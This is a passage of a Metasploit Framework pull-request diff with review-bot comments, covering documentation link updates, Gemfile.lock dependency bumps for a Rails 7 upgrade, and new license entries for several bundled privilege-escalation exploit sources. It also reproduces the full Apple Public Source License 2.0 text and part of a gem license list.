will be closed. We need to ensure the code we're adding to master is written to a high standard.
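Review bot: the `#module-additions` fragment is carried over unchanged onto the new docs.metasploit.com URL; GitHub wiki pages and the docs site may generate heading anchors differently, so the new page should be checked for a heading with exactly that id, otherwise the link silently lands at the top of the page.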
@@ -83,7 +83,7 @@ If you need some more guidance, talk to the main body of open source contributor
Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
curve, so keep it up!
[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
[Code of Conduct]:https://docs.metasploit.com/docs/code-of-conduct.html
[Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
[Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
[help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
@@ -101,7 +101,7 @@ curve, so keep it up!
[PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
[pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
[API]:https://rapid7.github.io/metasploit-framework/api
[module documentation]:https://github.com/rapid7/metasploit-framework/wiki/Module-Documentation
[module documentation]:https://docs.metasploit.com/docs/using-metasploit/basics/module-documentation.html
[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
[RSpec]:http://rspec.info
[Better Specs]:http://www.betterspecs.org/
+70 -65
@@ -1,10 +1,10 @@
PATH
remote: .
specs:
metasploit-framework (6.2.36)
actionpack (~> 6.0)
activerecord (~> 6.0)
activesupport (~> 6.0)
metasploit-framework (6.3.3)
actionpack (~> 7.0)
activerecord (~> 7.0)
activesupport (~> 7.0)
aws-sdk-ec2
aws-sdk-iam
aws-sdk-s3
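Review bot: bumping the framework to 6.3.3 with `actionpack`/`activerecord`/`activesupport` moved from `~> 6.0` to `~> 7.0` is a major Rails upgrade, not a routine lock refresh; it is consistent with the later hunks (`metasploit-concern` 5.0.1, `metasploit-model` 5.0.1 and `metasploit_data_models` 6.0.2, all on `~> 7.0`), but the PR description should call out the Rails 7 migration explicitly so downstream packagers know the database gems changed major versions too.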
@@ -29,7 +29,7 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 2.0.105)
metasploit-payloads (= 2.0.108)
metasploit_data_models
metasploit_payloads-mettle (= 1.0.20)
mqtt
@@ -51,6 +51,7 @@ PATH
pg
puma
railties
rasn1
rb-readline
recog
redcarpet
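Review bot: `rasn1` appears here as a new direct dependency of the framework (resolved to 0.12.1 with `strptime (~> 0.2.5)` in the GEM section below); given the Kerberos and PKINIT work in this range it is presumably the ASN.1 encoder/decoder for those structures, and the gemspec should pin a minimum version so that a lockfile regeneration cannot resolve to an older rasn1 lacking the types the Kerberos code relies on.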
@@ -96,30 +97,29 @@ GEM
remote: https://rubygems.org/
specs:
Ascii85 (1.1.0)
actionpack (6.1.7)
actionview (= 6.1.7)
activesupport (= 6.1.7)
rack (~> 2.0, >= 2.0.9)
actionpack (7.0.4.2)
actionview (= 7.0.4.2)
activesupport (= 7.0.4.2)
rack (~> 2.0, >= 2.2.0)
rack-test (>= 0.6.3)
rails-dom-testing (~> 2.0)
rails-html-sanitizer (~> 1.0, >= 1.2.0)
actionview (6.1.7)
activesupport (= 6.1.7)
actionview (7.0.4.2)
activesupport (= 7.0.4.2)
builder (~> 3.1)
erubi (~> 1.4)
rails-dom-testing (~> 2.0)
rails-html-sanitizer (~> 1.1, >= 1.2.0)
activemodel (6.1.7)
activesupport (= 6.1.7)
activerecord (6.1.7)
activemodel (= 6.1.7)
activesupport (= 6.1.7)
activesupport (6.1.7)
activemodel (7.0.4.2)
activesupport (= 7.0.4.2)
activerecord (7.0.4.2)
activemodel (= 7.0.4.2)
activesupport (= 7.0.4.2)
activesupport (7.0.4.2)
concurrent-ruby (~> 1.0, >= 1.0.2)
i18n (>= 1.6, < 2)
minitest (>= 5.1)
tzinfo (~> 2.0)
zeitwerk (~> 2.3)
addressable (2.8.1)
public_suffix (>= 2.0.2, < 6.0)
afm (0.2.2)
@@ -127,22 +127,22 @@ GEM
activerecord (>= 3.1.0, < 8)
ast (2.4.2)
aws-eventstream (1.2.0)
aws-partitions (1.689.0)
aws-sdk-core (3.168.4)
aws-partitions (1.707.0)
aws-sdk-core (3.170.0)
aws-eventstream (~> 1, >= 1.0.2)
aws-partitions (~> 1, >= 1.651.0)
aws-sigv4 (~> 1.5)
jmespath (~> 1, >= 1.6.1)
aws-sdk-ec2 (1.356.0)
aws-sdk-ec2 (1.364.0)
aws-sdk-core (~> 3, >= 3.165.0)
aws-sigv4 (~> 1.1)
aws-sdk-iam (1.73.0)
aws-sdk-iam (1.75.0)
aws-sdk-core (~> 3, >= 3.165.0)
aws-sigv4 (~> 1.1)
aws-sdk-kms (1.61.0)
aws-sdk-kms (1.62.0)
aws-sdk-core (~> 3, >= 3.165.0)
aws-sigv4 (~> 1.1)
aws-sdk-s3 (1.117.2)
aws-sdk-s3 (1.119.0)
aws-sdk-core (~> 3, >= 3.165.0)
aws-sdk-kms (~> 1)
aws-sigv4 (~> 1.4)
@@ -150,12 +150,12 @@ GEM
aws-eventstream (~> 1, >= 1.0.2)
bcrypt (3.1.18)
bcrypt_pbkdf (1.1.0)
bindata (2.4.14)
bindata (2.4.15)
bson (4.15.0)
builder (3.2.4)
byebug (11.1.3)
coderay (1.1.3)
concurrent-ruby (1.1.10)
concurrent-ruby (1.2.0)
cookiejar (0.3.3)
crass (1.0.6)
daemons (1.4.1)
@@ -184,9 +184,9 @@ GEM
factory_bot_rails (6.2.0)
factory_bot (~> 6.2.0)
railties (>= 5.0.0)
faker (3.1.0)
faker (3.1.1)
i18n (>= 1.8.11, < 2)
faraday (2.7.2)
faraday (2.7.4)
faraday-net_http (>= 2.0, < 3.1)
ruby2_keywords (>= 0.0.4)
faraday-net_http (3.0.2)
@@ -230,11 +230,12 @@ GEM
nokogiri (>= 1.5.9)
memory_profiler (1.0.1)
metasm (1.0.5)
metasploit-concern (4.0.5)
activemodel (~> 6.0)
activesupport (~> 6.0)
railties (~> 6.0)
metasploit-credential (6.0.1)
metasploit-concern (5.0.1)
activemodel (~> 7.0)
activesupport (~> 7.0)
railties (~> 7.0)
zeitwerk
metasploit-credential (6.0.2)
metasploit-concern
metasploit-model
metasploit_data_models (>= 5.0.0)
@@ -244,19 +245,19 @@ GEM
rex-socket
rubyntlm
rubyzip
metasploit-model (4.0.6)
activemodel (~> 6.0)
activesupport (~> 6.0)
railties (~> 6.0)
metasploit-payloads (2.0.105)
metasploit_data_models (5.0.6)
activerecord (~> 6.0)
activesupport (~> 6.0)
metasploit-model (5.0.1)
activemodel (~> 7.0)
activesupport (~> 7.0)
railties (~> 7.0)
metasploit-payloads (2.0.108)
metasploit_data_models (6.0.2)
activerecord (~> 7.0)
activesupport (~> 7.0)
arel-helpers
metasploit-concern
metasploit-model (>= 3.1)
pg
railties (~> 6.0)
railties (~> 7.0)
recog
webrick
metasploit_payloads-mettle (1.0.20)
@@ -278,7 +279,7 @@ GEM
network_interface (0.0.2)
nexpose (7.3.0)
nio4r (2.5.8)
nokogiri (1.13.10)
nokogiri (1.14.1)
mini_portile2 (~> 2.8.0)
racc (~> 1.4)
nori (2.6.0)
@@ -312,7 +313,7 @@ GEM
puma (6.0.2)
nio4r (~> 2.0)
racc (1.6.2)
rack (2.2.5)
rack (2.2.6.2)
rack-protection (3.0.5)
rack
rack-test (2.0.2)
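Review bot: the `rack` bump from 2.2.5 to 2.2.6.2 deserves a mention in the release notes rather than being folded into dependency churn; rack's 2.2.6.x patch releases in early 2023 were security releases for request-parsing denial of service, so users running the framework's web service components get a fix from this change, not just a version refresh.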
@@ -320,21 +321,24 @@ GEM
rails-dom-testing (2.0.3)
activesupport (>= 4.2.0)
nokogiri (>= 1.6)
rails-html-sanitizer (1.4.4)
rails-html-sanitizer (1.5.0)
loofah (~> 2.19, >= 2.19.1)
railties (6.1.7)
actionpack (= 6.1.7)
activesupport (= 6.1.7)
railties (7.0.4.2)
actionpack (= 7.0.4.2)
activesupport (= 7.0.4.2)
method_source
rake (>= 12.2)
thor (~> 1.0)
zeitwerk (~> 2.5)
rainbow (3.1.1)
rake (13.0.6)
rasn1 (0.12.1)
strptime (~> 0.2.5)
rb-readline (0.5.5)
recog (3.0.3)
nokogiri
redcarpet (3.5.1)
regexp_parser (2.6.1)
redcarpet (3.6.0)
regexp_parser (2.6.2)
reline (0.3.2)
io-console (~> 0.5)
rex-arch (0.1.14)
@@ -345,12 +349,12 @@ GEM
rex-core
rex-struct2
rex-text
rex-core (0.1.28)
rex-core (0.1.30)
rex-encoder (0.1.6)
metasm
rex-arch
rex-text
rex-exploitation (0.1.36)
rex-exploitation (0.1.37)
jsobfu
metasm
rex-arch
@@ -368,21 +372,21 @@ GEM
rex-random_identifier
rex-text
ruby-rc4
rex-random_identifier (0.1.9)
rex-random_identifier (0.1.10)
rex-text
rex-registry (0.1.4)
rex-rop_builder (0.1.4)
metasm
rex-core
rex-text
rex-socket (0.1.43)
rex-socket (0.1.47)
rex-core
rex-sslscan (0.1.8)
rex-sslscan (0.1.9)
rex-core
rex-socket
rex-text
rex-struct2 (0.1.3)
rex-text (0.2.47)
rex-text (0.2.49)
rex-zip (0.1.4)
rex-text
rexml (3.2.5)
@@ -391,12 +395,12 @@ GEM
rspec-core (~> 3.12.0)
rspec-expectations (~> 3.12.0)
rspec-mocks (~> 3.12.0)
rspec-core (3.12.0)
rspec-core (3.12.1)
rspec-support (~> 3.12.0)
rspec-expectations (3.12.2)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.12.0)
rspec-mocks (3.12.2)
rspec-mocks (3.12.3)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.12.0)
rspec-rails (6.0.1)
@@ -410,16 +414,16 @@ GEM
rspec-rerun (1.1.0)
rspec (~> 3.0)
rspec-support (3.12.0)
rubocop (1.42.0)
rubocop (1.44.1)
json (~> 2.3)
parallel (~> 1.10)
parser (>= 3.1.2.1)
parser (>= 3.2.0.0)
rainbow (>= 2.2.2, < 4.0)
regexp_parser (>= 1.8, < 3.0)
rexml (>= 3.2.5, < 4.0)
rubocop-ast (>= 1.24.1, < 2.0)
ruby-progressbar (~> 1.7)
unicode-display_width (>= 1.4.0, < 3.0)
unicode-display_width (>= 2.4.0, < 3.0)
rubocop-ast (1.24.1)
parser (>= 3.1.1.0)
ruby-macho (3.0.0)
@@ -427,7 +431,7 @@ GEM
ruby-progressbar (1.11.0)
ruby-rc4 (0.1.5)
ruby2_keywords (0.0.5)
ruby_smb (3.2.1)
ruby_smb (3.2.4)
bindata
openssl-ccm
openssl-cmac
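Review bot: `ruby_smb` moves from 3.2.1 to 3.2.4, and the SMB Kerberos authentication added in this range ("Add initial SMB Kerberos authentication support", "Set the session key for older SMB dialects too") almost certainly depends on that newer release; the gemspec's ruby_smb requirement should be raised to match rather than relying on the lock alone, otherwise a fresh resolve under a looser constraint can pull an older ruby_smb and break Kerberos-over-SMB at runtime.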
@@ -449,9 +453,10 @@ GEM
rack (~> 2.2, >= 2.2.4)
rack-protection (= 3.0.5)
tilt (~> 2.0)
sqlite3 (1.5.4)
sqlite3 (1.6.0)
mini_portile2 (~> 2.8.0)
sshkey (2.0.0)
strptime (0.2.5)
swagger-blocks (3.0.0)
thin (1.8.1)
daemons (~> 1.0, >= 1.0.9)
@@ -462,7 +467,7 @@ GEM
timecop (0.9.6)
timeout (0.3.1)
ttfunk (1.7.0)
tzinfo (2.0.5)
tzinfo (2.0.6)
concurrent-ruby (~> 1.0)
tzinfo-data (1.2022.7)
tzinfo (>= 1.0.0)
@@ -478,7 +483,7 @@ GEM
websocket-extensions (>= 0.1.0)
websocket-extensions (0.1.5)
win32api (0.1.0)
windows_error (0.1.4)
windows_error (0.1.5)
winrm (2.3.6)
builder (>= 2.1.2)
erubi (~> 1.8)
+390
@@ -57,6 +57,20 @@ Copyright: 2018
License: GNU GPL 3
Purpose: This supports exploits/windows/local/ms18_8120_win32k_privesc module
Files: external/source/exploits/CVE-2022-1043/cve-2022-1043.c
Copyright: 2022 Open Source Security, Inc.
License: GNU GPL 2.0
Purpose: This source file is necessary for users to create a stand-alone executable
to exploit CVE-2022-1043, a local privilege escalation vulnerability in
Linux kernels 5.12-rc3 - 5.14-rc7.
Files: external/source/exploits/CVE-2022-22942/cve-2022-22942-dc.c
Copyright: 2022 Open Source Security, Inc.
License: GNU GPL 2.0
Purpose: This source file is necessary for users to create a stand-alone executable
to exploit CVE-2022-22942, a local privilege escalation vulnerability in
Linux kernels 4.14-rc1 - 5.17-rc1.
Files: exteneral/source/exploits/CVE-2022-26904/*
Copyright: 2022 Abdelhamid Naceri
License: MIT
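Review bot: the unchanged context line `Files: exteneral/source/exploits/CVE-2022-26904/*` has a typo (`exteneral`), pre-existing but sitting directly under the two new entries that spell the directory `external/`; fixing it in this same hunk would keep the file greppable by path. The two new GPL 2.0 entries otherwise follow the existing format and helpfully state the affected kernel ranges.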
@@ -121,6 +135,13 @@ Purpose: The built result is used in:
payloads/stages/windows/vncinject.rb
payloads/stages/windows/x64/vncinject.rb
Files: external/source/exploits/CVE-2022-46689/vm_unaligned_copy_switch_race.c
Copyright: 1999-2007 Apple Inc.
License: Apple
Purpose: This source file is necessary for users to create a stand-alone executable
to exploit CVE-2022-46689, a local privilege escalation vulnerability in
MacOSX versions (macOS dirty cow)
Files: lib/anemone.rb
lib/anemone/*
Copyright: 2009 Vertive, Inc.
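Review bot: the new CVE-2022-46689 entry is less precise than the two Linux entries added above: `MacOSX versions (macOS dirty cow)` does not say which macOS releases are affected, and the copyright line `1999-2007 Apple Inc.` indicates the file is derived from Apple source, in which case the entry should say so and name the original file so the APSL attribution requirements can be checked against it.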
@@ -998,3 +1019,372 @@ License: Zlib
2. Altered source versions must be plainly marked as such, and must not be
misrepresented as being the original software.
3. This notice may not be removed or altered from any source distribution.
License: Apple
APPLE PUBLIC SOURCE LICENSE
Version 2.0 - August 6, 2003
Please read this License carefully before downloading this software.
By downloading or using this software, you are agreeing to be bound by
the terms of this License. If you do not or cannot agree to the terms
of this License, please do not download or use the software.
1. General; Definitions. This License applies to any program or other
work which Apple Computer, Inc. ("Apple") makes publicly available and
which contains a notice placed by Apple identifying such program or
work as "Original Code" and stating that it is subject to the terms of
this Apple Public Source License version 2.0 ("License"). As used in
this License:
1.1 "Applicable Patent Rights" mean: (a) in the case where Apple is
the grantor of rights, (i) claims of patents that are now or hereafter
acquired, owned by or assigned to Apple and (ii) that cover subject
matter contained in the Original Code, but only to the extent
necessary to use, reproduce and/or distribute the Original Code
without infringement; and (b) in the case where You are the grantor of
rights, (i) claims of patents that are now or hereafter acquired,
owned by or assigned to You and (ii) that cover subject matter in Your
Modifications, taken alone or in combination with Original Code.
1.2 "Contributor" means any person or entity that creates or
contributes to the creation of Modifications.
1.3 "Covered Code" means the Original Code, Modifications, the
combination of Original Code and any Modifications, and/or any
respective portions thereof.
1.4 "Externally Deploy" means: (a) to sublicense, distribute or
otherwise make Covered Code available, directly or indirectly, to
anyone other than You; and/or (b) to use Covered Code, alone or as
part of a Larger Work, in any way to provide a service, including but
not limited to delivery of content, through electronic communication
with a client other than You.
1.5 "Larger Work" means a work which combines Covered Code or portions
thereof with code not governed by the terms of this License.
1.6 "Modifications" mean any addition to, deletion from, and/or change
to, the substance and/or structure of the Original Code, any previous
Modifications, the combination of Original Code and any previous
Modifications, and/or any respective portions thereof. When code is
released as a series of files, a Modification is: (a) any addition to
or deletion from the contents of a file containing Covered Code;
and/or (b) any new file or other representation of computer program
statements that contains any part of Covered Code.
1.7 "Original Code" means (a) the Source Code of a program or other
work as originally made available by Apple under this License,
including the Source Code of any updates or upgrades to such programs
or works made available by Apple under this License, and that has been
expressly identified by Apple as such in the header file(s) of such
work; and (b) the object code compiled from such Source Code and
originally made available by Apple under this License.
1.8 "Source Code" means the human readable form of a program or other
work that is suitable for making modifications to it, including all
modules it contains, plus any associated interface definition files,
scripts used to control compilation and installation of an executable
(object code).
1.9 "You" or "Your" means an individual or a legal entity exercising
rights under this License. For legal entities, "You" or "Your"
includes any entity which controls, is controlled by, or is under
common control with, You, where "control" means (a) the power, direct
or indirect, to cause the direction or management of such entity,
whether by contract or otherwise, or (b) ownership of fifty percent
(50%) or more of the outstanding shares or beneficial ownership of
such entity.
2. Permitted Uses; Conditions & Restrictions. Subject to the terms
and conditions of this License, Apple hereby grants You, effective on
the date You accept this License and download the Original Code, a
world-wide, royalty-free, non-exclusive license, to the extent of
Apple's Applicable Patent Rights and copyrights covering the Original
Code, to do the following:
2.1 Unmodified Code. You may use, reproduce, display, perform,
internally distribute within Your organization, and Externally Deploy
verbatim, unmodified copies of the Original Code, for commercial or
non-commercial purposes, provided that in each instance:
(a) You must retain and reproduce in all copies of Original Code the
copyright and other proprietary notices and disclaimers of Apple as
they appear in the Original Code, and keep intact all notices in the
Original Code that refer to this License; and
(b) You must include a copy of this License with every copy of Source
Code of Covered Code and documentation You distribute or Externally
Deploy, and You may not offer or impose any terms on such Source Code
that alter or restrict this License or the recipients' rights
hereunder, except as permitted under Section 6.
2.2 Modified Code. You may modify Covered Code and use, reproduce,
display, perform, internally distribute within Your organization, and
Externally Deploy Your Modifications and Covered Code, for commercial
or non-commercial purposes, provided that in each instance You also
meet all of these conditions:
(a) You must satisfy all the conditions of Section 2.1 with respect to
the Source Code of the Covered Code;
(b) You must duplicate, to the extent it does not already exist, the
notice in Exhibit A in each file of the Source Code of all Your
Modifications, and cause the modified files to carry prominent notices
stating that You changed the files and the date of any change; and
(c) If You Externally Deploy Your Modifications, You must make
Source Code of all Your Externally Deployed Modifications either
available to those to whom You have Externally Deployed Your
Modifications, or publicly available. Source Code of Your Externally
Deployed Modifications must be released under the terms set forth in
this License, including the license grants set forth in Section 3
below, for as long as you Externally Deploy the Covered Code or twelve
(12) months from the date of initial External Deployment, whichever is
longer. You should preferably distribute the Source Code of Your
Externally Deployed Modifications electronically (e.g. download from a
web site).
2.3 Distribution of Executable Versions. In addition, if You
Externally Deploy Covered Code (Original Code and/or Modifications) in
object code, executable form only, You must include a prominent
notice, in the code itself as well as in related documentation,
stating that Source Code of the Covered Code is available under the
terms of this License with information on how and where to obtain such
Source Code.
2.4 Third Party Rights. You expressly acknowledge and agree that
although Apple and each Contributor grants the licenses to their
respective portions of the Covered Code set forth herein, no
assurances are provided by Apple or any Contributor that the Covered
Code does not infringe the patent or other intellectual property
rights of any other entity. Apple and each Contributor disclaim any
liability to You for claims brought by any other entity based on
infringement of intellectual property rights or otherwise. As a
condition to exercising the rights and licenses granted hereunder, You
hereby assume sole responsibility to secure any other intellectual
property rights needed, if any. For example, if a third party patent
license is required to allow You to distribute the Covered Code, it is
Your responsibility to acquire that license before distributing the
Covered Code.
3. Your Grants. In consideration of, and as a condition to, the
licenses granted to You under this License, You hereby grant to any
person or entity receiving or distributing Covered Code under this
License a non-exclusive, royalty-free, perpetual, irrevocable license,
under Your Applicable Patent Rights and other intellectual property
rights (other than patent) owned or controlled by You, to use,
reproduce, display, perform, modify, sublicense, distribute and
Externally Deploy Your Modifications of the same scope and extent as
Apple's licenses under Sections 2.1 and 2.2 above.
4. Larger Works. You may create a Larger Work by combining Covered
Code with other code not governed by the terms of this License and
distribute the Larger Work as a single product. In each such instance,
You must make sure the requirements of this License are fulfilled for
the Covered Code or any portion thereof.
5. Limitations on Patent License. Except as expressly stated in
Section 2, no other patent rights, express or implied, are granted by
Apple herein. Modifications and/or Larger Works may require additional
patent licenses from Apple which Apple may grant in its sole
discretion.
6. Additional Terms. You may choose to offer, and to charge a fee for,
warranty, support, indemnity or liability obligations and/or other
rights consistent with the scope of the license granted herein
("Additional Terms") to one or more recipients of Covered Code.
However, You may do so only on Your own behalf and as Your sole
responsibility, and not on behalf of Apple or any Contributor. You
must obtain the recipient's agreement that any such Additional Terms
are offered by You alone, and You hereby agree to indemnify, defend
and hold Apple and every Contributor harmless for any liability
incurred by or claims asserted against Apple or such Contributor by
reason of any such Additional Terms.
7. Versions of the License. Apple may publish revised and/or new
versions of this License from time to time. Each version will be given
a distinguishing version number. Once Original Code has been published
under a particular version of this License, You may continue to use it
under the terms of that version. You may also choose to use such
Original Code under the terms of any subsequent version of this
License published by Apple. No one other than Apple has the right to
modify the terms applicable to Covered Code created under this
License.
8. NO WARRANTY OR SUPPORT. The Covered Code may contain in whole or in
part pre-release, untested, or not fully tested works. The Covered
Code may contain errors that could cause failures or loss of data, and
may be incomplete or contain inaccuracies. You expressly acknowledge
and agree that use of the Covered Code, or any portion thereof, is at
Your sole and entire risk. THE COVERED CODE IS PROVIDED "AS IS" AND
WITHOUT WARRANTY, UPGRADES OR SUPPORT OF ANY KIND AND APPLE AND
APPLE'S LICENSOR(S) (COLLECTIVELY REFERRED TO AS "APPLE" FOR THE
PURPOSES OF SECTIONS 8 AND 9) AND ALL CONTRIBUTORS EXPRESSLY DISCLAIM
ALL WARRANTIES AND/OR CONDITIONS, EXPRESS OR IMPLIED, INCLUDING, BUT
NOT LIMITED TO, THE IMPLIED WARRANTIES AND/OR CONDITIONS OF
MERCHANTABILITY, OF SATISFACTORY QUALITY, OF FITNESS FOR A PARTICULAR
PURPOSE, OF ACCURACY, OF QUIET ENJOYMENT, AND NONINFRINGEMENT OF THIRD
PARTY RIGHTS. APPLE AND EACH CONTRIBUTOR DOES NOT WARRANT AGAINST
INTERFERENCE WITH YOUR ENJOYMENT OF THE COVERED CODE, THAT THE
FUNCTIONS CONTAINED IN THE COVERED CODE WILL MEET YOUR REQUIREMENTS,
THAT THE OPERATION OF THE COVERED CODE WILL BE UNINTERRUPTED OR
ERROR-FREE, OR THAT DEFECTS IN THE COVERED CODE WILL BE CORRECTED. NO
ORAL OR WRITTEN INFORMATION OR ADVICE GIVEN BY APPLE, AN APPLE
AUTHORIZED REPRESENTATIVE OR ANY CONTRIBUTOR SHALL CREATE A WARRANTY.
You acknowledge that the Covered Code is not intended for use in the
operation of nuclear facilities, aircraft navigation, communication
systems, or air traffic control machines in which case the failure of
the Covered Code could lead to death, personal injury, or severe
physical or environmental damage.
9. LIMITATION OF LIABILITY. TO THE EXTENT NOT PROHIBITED BY LAW, IN NO
EVENT SHALL APPLE OR ANY CONTRIBUTOR BE LIABLE FOR ANY INCIDENTAL,
SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES ARISING OUT OF OR RELATING
TO THIS LICENSE OR YOUR USE OR INABILITY TO USE THE COVERED CODE, OR
ANY PORTION THEREOF, WHETHER UNDER A THEORY OF CONTRACT, WARRANTY,
TORT (INCLUDING NEGLIGENCE), PRODUCTS LIABILITY OR OTHERWISE, EVEN IF
APPLE OR SUCH CONTRIBUTOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
DAMAGES AND NOTWITHSTANDING THE FAILURE OF ESSENTIAL PURPOSE OF ANY
REMEDY. SOME JURISDICTIONS DO NOT ALLOW THE LIMITATION OF LIABILITY OF
INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION MAY NOT APPLY
TO YOU. In no event shall Apple's total liability to You for all
damages (other than as may be required by applicable law) under this
License exceed the amount of fifty dollars ($50.00).
10. Trademarks. This License does not grant any rights to use the
trademarks or trade names "Apple", "Apple Computer", "Mac", "Mac OS",
"QuickTime", "QuickTime Streaming Server" or any other trademarks,
service marks, logos or trade names belonging to Apple (collectively
"Apple Marks") or to any trademark, service mark, logo or trade name
belonging to any Contributor. You agree not to use any Apple Marks in
or as part of the name of products derived from the Original Code or
to endorse or promote products derived from the Original Code other
than as expressly permitted by and in strict compliance at all times
with Apple's third party trademark usage guidelines which are posted
at http://www.apple.com/legal/guidelinesfor3rdparties.html.
11. Ownership. Subject to the licenses granted under this License,
each Contributor retains all rights, title and interest in and to any
Modifications made by such Contributor. Apple retains all rights,
title and interest in and to the Original Code and any Modifications
made by or on behalf of Apple ("Apple Modifications"), and such Apple
Modifications will not be automatically subject to this License. Apple
may, at its sole discretion, choose to license such Apple
Modifications under this License, or on different terms from those
contained in this License or may choose not to license them at all.
12. Termination.
12.1 Termination. This License and the rights granted hereunder will
terminate:
(a) automatically without notice from Apple if You fail to comply with
any term(s) of this License and fail to cure such breach within 30
days of becoming aware of such breach;
(b) immediately in the event of the circumstances described in Section
13.5(b); or
(c) automatically without notice from Apple if You, at any time during
the term of this License, commence an action for patent infringement
against Apple; provided that Apple did not first commence
an action for patent infringement against You in that instance.
12.2 Effect of Termination. Upon termination, You agree to immediately
stop any further use, reproduction, modification, sublicensing and
distribution of the Covered Code. All sublicenses to the Covered Code
which have been properly granted prior to termination shall survive
any termination of this License. Provisions which, by their nature,
should remain in effect beyond the termination of this License shall
survive, including but not limited to Sections 3, 5, 8, 9, 10, 11,
12.2 and 13. No party will be liable to any other for compensation,
indemnity or damages of any sort solely as a result of terminating
this License in accordance with its terms, and termination of this
License will be without prejudice to any other right or remedy of
any party.
13. Miscellaneous.
13.1 Government End Users. The Covered Code is a "commercial item" as
defined in FAR 2.101. Government software and technical data rights in
the Covered Code include only those rights customarily provided to the
public as defined in this License. This customary commercial license
in technical data and software is provided in accordance with FAR
12.211 (Technical Data) and 12.212 (Computer Software) and, for
Department of Defense purchases, DFAR 252.227-7015 (Technical Data --
Commercial Items) and 227.7202-3 (Rights in Commercial Computer
Software or Computer Software Documentation). Accordingly, all U.S.
Government End Users acquire Covered Code with only those rights set
forth herein.
13.2 Relationship of Parties. This License will not be construed as
creating an agency, partnership, joint venture or any other form of
legal association between or among You, Apple or any Contributor, and
You will not represent to the contrary, whether expressly, by
implication, appearance or otherwise.
13.3 Independent Development. Nothing in this License will impair
Apple's right to acquire, license, develop, have others develop for
it, market and/or distribute technology or products that perform the
same or similar functions as, or otherwise compete with,
Modifications, Larger Works, technology or products that You may
develop, produce, market or distribute.
13.4 Waiver; Construction. Failure by Apple or any Contributor to
enforce any provision of this License will not be deemed a waiver of
future enforcement of that or any other provision. Any law or
regulation which provides that the language of a contract shall be
construed against the drafter will not apply to this License.
13.5 Severability. (a) If for any reason a court of competent
jurisdiction finds any provision of this License, or portion thereof,
to be unenforceable, that provision of the License will be enforced to
the maximum extent permissible so as to effect the economic benefits
and intent of the parties, and the remainder of this License will
continue in full force and effect. (b) Notwithstanding the foregoing,
if applicable law prohibits or restricts You from fully and/or
specifically complying with Sections 2 and/or 3 or prevents the
enforceability of either of those Sections, this License will
immediately terminate and You must immediately discontinue any use of
the Covered Code and destroy all copies of it that are in your
possession or control.
13.6 Dispute Resolution. Any litigation or other dispute resolution
between You and Apple relating to this License shall take place in the
Northern District of California, and You and Apple hereby consent to
the personal jurisdiction of, and venue in, the state and federal
courts within that District with respect to this License. The
application of the United Nations Convention on Contracts for the
International Sale of Goods is expressly excluded.
13.7 Entire Agreement; Governing Law. This License constitutes the
entire agreement between the parties with respect to the subject
matter hereof. This License shall be governed by the laws of the
United States and the State of California, except that body of
California law concerning conflicts of law.
Where You are located in the province of Quebec, Canada, the following
clause applies: The parties hereby confirm that they have requested
that this License and all related documents be drafted in English. The
parties have required that this contract and all related documents be
drafted in English.
EXHIBIT A.
"Portions Copyright (c) 1999-2003 Apple Computer, Inc. All Rights
Reserved.
This file contains Original Code and/or Modifications of Original Code
as defined in and that are subject to the Apple Public Source License
Version 2.0 (the 'License'). You may not use this file except in
compliance with the License. Please obtain a copy of the License at
http://www.opensource.apple.com/apsl/ and read it before using this
file.
The Original Code and all software distributed under the License are
distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
Please see the License for the specific language governing rights and
limitations under the License."
+42 -40
@@ -1,31 +1,31 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh
Ascii85, 1.1.0, MIT
actionpack, 6.1.7, MIT
actionview, 6.1.7, MIT
activemodel, 6.1.7, MIT
activerecord, 6.1.7, MIT
activesupport, 6.1.7, MIT
actionpack, 7.0.4.2, MIT
actionview, 7.0.4.2, MIT
activemodel, 7.0.4.2, MIT
activerecord, 7.0.4.2, MIT
activesupport, 7.0.4.2, MIT
addressable, 2.8.1, "Apache 2.0"
afm, 0.2.2, MIT
arel-helpers, 2.14.0, MIT
ast, 2.4.2, MIT
aws-eventstream, 1.2.0, "Apache 2.0"
aws-partitions, 1.689.0, "Apache 2.0"
aws-sdk-core, 3.168.4, "Apache 2.0"
aws-sdk-ec2, 1.356.0, "Apache 2.0"
aws-sdk-iam, 1.73.0, "Apache 2.0"
aws-sdk-kms, 1.61.0, "Apache 2.0"
aws-sdk-s3, 1.117.2, "Apache 2.0"
aws-partitions, 1.707.0, "Apache 2.0"
aws-sdk-core, 3.170.0, "Apache 2.0"
aws-sdk-ec2, 1.364.0, "Apache 2.0"
aws-sdk-iam, 1.75.0, "Apache 2.0"
aws-sdk-kms, 1.62.0, "Apache 2.0"
aws-sdk-s3, 1.119.0, "Apache 2.0"
aws-sigv4, 1.5.2, "Apache 2.0"
bcrypt, 3.1.18, MIT
bcrypt_pbkdf, 1.1.0, MIT
bindata, 2.4.14, ruby
bindata, 2.4.15, "Simplified BSD"
bson, 4.15.0, "Apache 2.0"
builder, 3.2.4, MIT
bundler, 2.1.4, MIT
byebug, 11.1.3, "Simplified BSD"
coderay, 1.1.3, MIT
concurrent-ruby, 1.1.10, MIT
concurrent-ruby, 1.2.0, MIT
cookiejar, 0.3.3, unknown
crass, 1.0.6, MIT
daemons, 1.4.1, MIT
